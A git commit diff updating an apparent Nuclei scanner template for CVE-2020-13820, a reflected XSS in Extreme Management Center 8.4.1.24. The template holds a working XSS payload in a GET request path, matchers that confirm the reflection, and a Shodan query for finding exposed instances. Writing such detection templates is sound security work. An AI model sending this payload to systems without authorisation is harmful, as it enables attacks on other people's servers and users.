Update CVE-2020-13820.yaml

patch-1
Dhiyaneshwaran 2022-09-29 10:26:37 +05:30 committed by GitHub
parent e5109c72ef
commit 7a89796ed1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 10 additions and 6 deletions

View File

@ -3,23 +3,26 @@ info:
name: Extreme Management Center 8.4.1.24 XSS name: Extreme Management Center 8.4.1.24 XSS
author: tess author: tess
severity: medium severity: medium
description: Extreme Management Center 8.4.1.24 allows unauthenticated reflected xss description: Extreme Management Center 8.4.1.24 allows unauthenticated reflected XSS via a parameter in a GET request.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-13820
- https://medium.com/@0x00crash/xss-reflected-in-extreme-management-center-8-4-1-24-cve-2020-13820-c6febe951219 - https://medium.com/@0x00crash/xss-reflected-in-extreme-management-center-8-4-1-24-cve-2020-13820-c6febe951219
- https://gtacknowledge.extremenetworks.com/articles/Solution/000051136 - https://gtacknowledge.extremenetworks.com/articles/Solution/000051136
metadata: - https://nvd.nist.gov/vuln/detail/CVE-2020-13820
verified: true - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-13820
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1 cvss-score: 6.1
cve-id: CVE-2020-13820 cve-id: CVE-2020-13820
cwe-id: CWE-79 cwe-id: CWE-79
tags: cve,cve2020,xss metadata:
verified: true
shodan-query: title:"Extreme Management Center"
tags: cve,cve2020,xss,extreme
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}//OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain)' - "{{BaseURL}}//OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain)"
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -27,6 +30,7 @@ requests:
part: body part: body
words: words:
- "autofocus onfocus='alert(document.domain)" - "autofocus onfocus='alert(document.domain)"
- "Extreme Management Center"
condition: and condition: and
- type: status - type: status